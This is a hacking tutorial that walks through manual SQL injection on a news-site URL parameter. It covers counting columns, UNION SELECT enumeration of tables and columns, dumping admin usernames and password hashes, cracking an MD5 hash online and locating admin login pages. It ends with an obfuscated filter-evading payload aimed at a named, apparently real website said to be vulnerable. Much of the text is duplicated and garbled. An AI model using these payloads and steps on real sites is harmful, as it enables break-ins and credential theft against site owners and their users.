SQL Injection (Manually):-
Let’s Start:
Let’s Start:
Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to
Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to
get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here” and open in new tab.
Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql attack or not.To Check SQL vulnerability add „ sign after the URL
http://www.website.com/news/news.php?id=130′
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"
Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql attack or not.To Check SQL vulnerability add „ sign after the URL
http://www.website.com/news/news.php?id=130′
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"
Step2: Find number of columns. Lets use "ORDER BY” clause here, it is used to sort the columns.Choose any number, say 10. Here I have assumed that number columns cant be more then 10.”–” is used for making anything after it comment.
Now go to site which is Vulnerable to SQL.http://www.Website.com/news/news.php?id=130 order by 10– Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9. But again we got an error. This means number of columns are less than 9. Like this we keep on moving, until we don‟t get any error. Finally we reach on ‟6′
Now go to site which is Vulnerable to SQL.http://www.Website.com/news/news.php?id=130 order by 10– Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9. But again we got an error. This means number of columns are less than 9. Like this we keep on moving, until we don‟t get any error. Finally we reach on ‟6′
http://www.website.com/news/news.php?id=130 order by 6– we didn‟t get any error, this means there are 6 columns.
Step 3:Find vulnerable columns. Now lets use "UNION ALL” and "SELECT” command. Remember to put dash (-) before 130.http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6–. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version” or "verson()” (if first one doesn‟t work).
Step 3:Find vulnerable columns. Now lets use "UNION ALL” and "SELECT” command. Remember to put dash (-) before 130.http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6–. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version” or "verson()” (if first one doesn‟t work).
http://www.website.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6– We got the version on screen. It is. The only thing to note is that version is 5 point something that is greater than 5. We would have followed some other approach in case the version would be less than 5 because there is no database by default like "information_schema” which stores information about tables/columns of other databases. in version less than 5.
Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–
Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–
We got first table name on the screen.
To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
Step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with „column‟http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()– There is a repeating element like in this case is „id‟ .From
To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
Step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with „column‟http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()– There is a repeating element like in this case is „id‟ .From
it, we come to know which table number has which columns.
Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a” is used simply to insert a colon in result to separate it, it is hex of colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin–.
Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a” is used simply to insert a colon in result to separate it, it is hex of colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin–.
So finally we got the usernames and passwords on screen. But passwords are encrypted. Mostly these encryptions are crackable. Lets choose any username say "Sneds”. The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .
Lets logon to http://md5crack.com/crackmd5.php or http://www.md5decrypter.co.uk and put the hashed(encrypted) password here. And it would crack for us. We got „oorwullie‟ in result ( password in clear text).
Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying.
Lets logon to http://md5crack.com/crackmd5.php or http://www.md5decrypter.co.uk and put the hashed(encrypted) password here. And it would crack for us. We got „oorwullie‟ in result ( password in clear text).
Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying.
Sometimes very strong hashes can not be cracked. Login page of website: So you got the key, where is lock now ? Most of the websites have login pages at default locations. There is any website, saywww.xyz.com. The login page would be at www.xyz.com/admin ,www.xyz.com/administrator , www.xyz.com/adminlogin etc. Download this admin page finder
Example of Injection
www.bitaraf.com
http://www.bitaraf.com/showlink.php?id=.1244923%injecthere (vulnerable )
http://www.bitaraf.com/showlink.php?id=.1244923+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2Cconcat%280x3c2f7469746c653e3c666f6e7420636f6c6f723d7265643e4164657368206861786f723c62723e%2Cuser%28%29%2C0x3c62723e%2Cversion%28%29%2C0x3c62723e%2Cdatabase%28%29%2C0x3c62723e%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28select%281%29from%28information_schema.columns%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2Ctable_name%2Ccolumn_name%29%29%2C%40%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--+
ADMIN PANNEL
